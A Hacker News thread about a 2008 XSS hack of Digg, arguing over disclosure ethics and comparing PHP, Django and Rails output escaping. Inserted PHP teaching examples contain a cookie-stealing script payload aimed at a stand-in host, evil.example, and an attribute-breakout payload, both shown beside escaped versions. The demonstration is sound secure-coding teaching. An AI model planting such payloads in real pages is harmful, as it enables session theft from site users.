How I hacked Digg (phoboslab.org)
77 points by sant0sk1 on June 4, 2008 | 34 comments



I like how people that write these types of stories always justify it as trying to help out... "In the hope that digg would now listen, I sent them a second email."

So digg was supposed to jump on this problem and not worry about anything else apparently.

It always seemed akin to saying

"I saw an unlocked vehicle today and I think it's important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I put it in neutral and let it roll down a hill so that they will now heed the warning."

While warning about possible vulnerabilities is helpful I have a hard time believing exploiting them is as well.


"So digg was supposed to jump on this problem and not worry about anything else apparently."

Quite frankly, yes they should. If you have an XSS hole in your web application your other user-facing security measures are worthless. If you're a social application of any sort it's even worse; you're just asking to be hit by a worm.

XSS is a Big Deal. XSS holes are also really easy to find, so if a security researcher spots one it's not unlikely that a Bad Guy will find them as well.


A better analogy would be "I saw an unlocked vehicle today and I think it's important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I opened the car and left a note on the dashboard stating I'd been in the car."


I disagree. I think the better analogy would be: "I saw an unlocked vehicle today and I think it's important that all vehicles remain locked. Since they didn't come running out when I told them to lock the car, I [opened] the car and left a note on the dashboard stating I'd been in the car."

"And then I went into the bad part of town and distributed fliers all around about how the car at the corner of Main and Screwed had been left unlocked for a while and how it had a great stereo and iPod in it."


Still a bit off. "[going] into the bad part of town" would imply he went on some devious message board and there released the information with a flashy heading.


An unlocked car only leaves the owner vulnerable to break-ins. This is more like noticing that Honda Civics can't be properly locked, and leaving a note on the dashboard of each and every one, so that Honda will experience pressure to fix the problem.


The full-disclosure community used to believe in this philosophy but for different reasons. They were trying to disclose the bug as a form of motivation with little regard to what else the company was working on. I suspect this message is not well understood now and the notion of full-disclosure being good is all that's left.


Your example does make sense, but in the case of Digg, it's not a car, but a careless air carrier.


Reminds me of one of my all-time favorite cartoons: "Too Much Coffee Man, Doing Your Part"

http://tmcm.com/comics/webcomics/092_yourpart


A better analogy would be: your car may be locked, but other people have keys that unlock your car. Then someone proves it by unlocking the car with his key.


lol, liking your analogy :)


It does seem like a juvenile mentality, but seriously, fuck digg.


While I support full-disclosure, I don't think the author acted responsibly. He didn't give them enough time to respond, he didn't make any extra effort to contact digg's engineers and he also very publicly bragged about it.

He didn't try to act modest and he used the buzzword 'hack' which appeals more to non-technical than to technical people. Publicity stunt if you ask me.


You seem surprised. Digg is one of the most popular sites on the Internet; the guy is (rightfully) proud that he can make it break horribly.


"Publicity stunt if you ask me."

For sure, but isn't everything on Digg a publicity stunt?


Agreed. A couple of weeks as a bare minimum, to give engineers a chance to make fixes and test thoroughly.


This is exactly what happens when you get a bit too excited about mixing presentation and logic. It's easy for "$foo" to slip into the HTML, and then your site gets hacked. This isn't really a PHP problem, but PHP certainly goes out of its way to encourage you to write bad code like this.


If you ask me, mixing presentation and logic is the core of most web development. They just missed a lot of opportunities for sanitizing data.

I also don't see how PHP goes 'out of its way'. It doesn't do anything, neither do most other web languages, you build or use existing frameworks and libraries to help with such tasks.


Here's how to safely output a variable in PHP:

<?php echo htmlspecialchars($name); ?>

Here's how to do the same thing in Django:

{{ name }}

That's the thing that bugs me most about PHP: it's not even a productive templating language!
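The pattern described a few comments up, a "$foo" slipping straight into the HTML, beside the htmlspecialchars() form, as an added example that is not code from the original post or from the Digg story. The attacker-supplied value is constructed for the demo and stands in for something like $_GET['name'] or a stored profile field; the function names are mine. It assumes PHP 5.2 or later (the three-argument htmlspecialchars() call).

```php
<?php
// Added example, not from the thread. Shows the same variable rendered two
// ways: interpolated raw into markup, and escaped for the HTML text context.

// Constructed attacker-controlled input (hypothetical; would normally come
// from a request parameter or a database field written by another user).
$name = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// Vulnerable: "$foo" interpolated into the page. The browser parses the
// <script> element and runs it with the victim's cookies in scope.
function render_unsafe($name) {
    return "<p>Hello, $name!</p>";
}

// Hardened: escape at the output boundary. ENT_QUOTES turns both quote
// characters into entities as well as < > &; the charset argument keeps
// multibyte sequences from being mis-decoded.
function render_safe($name) {
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '!</p>';
}

// Self-check: the escaped rendering contains no tag at all, only entities.
function payload_is_inert($html) {
    return strpos($html, '<script') === false && strpos($html, '&lt;script') !== false;
}

echo render_unsafe($name), PHP_EOL;
echo render_safe($name), PHP_EOL;
echo payload_is_inert(render_safe($name)) ? "escaped form is inert" : "STILL VULNERABLE", PHP_EOL;
```

The escaping has to happen at output time, per context: the same $name needs htmlspecialchars() in HTML, json_encode() inside a script block and rawurlencode() inside a URL, which is why "sanitize on input" alone does not close the hole.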


I didn't realize Django is a language. Let's not compare frameworks to languages.


I personally think PHP blurs the line between a language and framework. The "framework" part is the 20,000 builtin functions and the mechanism it provides for executing code as part of a dynamic web request.

In any case, my intent wasn't to compare Django to PHP, it was to point out that PHP's default way of outputting things really does make it inconvenient to write secure code - hence answering the parent post that argued that poor security had nothing to do with the language used.


Django is a framework, but it also has a language for writing templates, which is what the example above is written in.


You are comparing apples to oranges. Django is a framework built on Python. Python doesn't provide anything to escape strings. I'm sure there are also PHP frameworks and templating languages which make this very easy.

I realize I'm playing devil's advocate because I love Python, but you shouldn't put blame nor give credit where it isn't due.



Here you go:

function o($name) { echo htmlspecialchars($name); }

o($name);


You still need to do this:

<?php o($name); ?>

I've used this exact function in my own code, though I call it "h". Really sucks that we have to do this - not to mention that PHP's global namespace for functions means it's better to have long names that are more likely not to clash with third party code.


Actually you can use the <?= syntax to make it even more concise:

function o($name) { return(htmlspecialchars($name));}

<?=o($name)?>

which lo, and behold, looks a lot like the rails candidate below.


You can't write code for redistribution like that though as most PHP installations have that option disabled since it interferes with XML processing instructions.
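A version of the o()/h() helper from the comments above, as an added example (not code from the original post), with the caveat a practitioner would want: htmlspecialchars() called with no flags uses ENT_COMPAT on PHP before 8.1, which escapes double quotes but leaves single quotes alone, so the one-argument form is not safe inside a single-quoted attribute. The helper name myapp_h and the payload are mine; the long prefixed name follows the thread's own point about PHP's global function namespace. One further note on the short-echo discussion: since PHP 5.4 the <?= tag is always available regardless of the short_open_tag setting.

```php
<?php
// Added example, not from the thread. The helper plus a demonstration of why
// ENT_QUOTES matters for attribute contexts.

// Escape for HTML text nodes and for either kind of quoted attribute.
// The (string) cast covers ints and nulls that would otherwise be passed raw.
function myapp_h($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Constructed payload aimed at a single-quoted attribute: closes the title
// attribute and adds an event handler.
$name = "' onmouseover='alert(1)";

// Default flags (ENT_COMPAT, the pre-8.1 behaviour of a one-argument call):
// the single quote survives and the payload breaks out of title='...'.
function render_weak($name) {
    return "<a title='" . htmlspecialchars($name, ENT_COMPAT, 'UTF-8') . "'>x</a>";
}

// ENT_QUOTES: the quote becomes &#039; and stays inside the attribute value.
function render_strong($name) {
    return "<a title='" . myapp_h($name) . "'>x</a>";
}

// A well-formed single-quoted attribute around the value leaves exactly the
// two delimiting quotes in the output; any more means the value broke out.
function attribute_intact($html) {
    return substr_count($html, "'") === 2;
}

echo render_weak($name), PHP_EOL;
echo render_strong($name), PHP_EOL;
echo attribute_intact(render_weak($name)) ? "weak: intact" : "weak: BROKE OUT", PHP_EOL;
echo attribute_intact(render_strong($name)) ? "strong: intact" : "strong: BROKE OUT", PHP_EOL;
```

In a template the call reads <?= myapp_h($name) ?>, the shape the Rails <%= h(@var) %> comment below is pointing at. Even with ENT_QUOTES, the helper only covers the HTML text and quoted-attribute contexts; an unquoted attribute, a javascript: URL or an inline script block each need their own encoder.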


And in Rails

<%= h(@var) %>


Who cares about digg? The site is going downhill, thanks to idiots posting "news" about their latest trip to WalMart and 10 reasons to hate Bush.


You've inspired me for some reason to defend the site (I'll admit to bias, check my profile). Digg is a very highly trafficked site, and the content might not be to the liking of the people here, but it started just like most of the companies that inspire everyone here that I've interacted with. Along the way it's done some cool stuff, created jobs for coders and inspired a raft of imitators.

Don't know why you inspired me to speak up.

And concerning the current problem, avoiding XSS and CSRF holes demands vigilance, especially with the many, many demands put on programmers at startups. Perhaps only with php, but I think programmers are often clever enough to work around almost any constraints, and sometimes they see security as a constraint. Digg always attracted users interested in proving their mettle by finding security holes, and as a result the developers are pretty vigilant about fixing holes.

Concerning the content of digg, well, it's an adventure ;-). As it's grown, it's left lots of room in its wake for other (maybe better) communities to develop.


You only found 10 reasons to hate Bush there.

I'm up to 182 and counting. I believe the subject is a total obsession with many of the "contributors" to that site.


Oh!...we have ALL soooo wanted to hack digg, don't get me started on digg...see if I had a.....


I thought the title of the article should read "How I cracked Digg". Go away cracker!

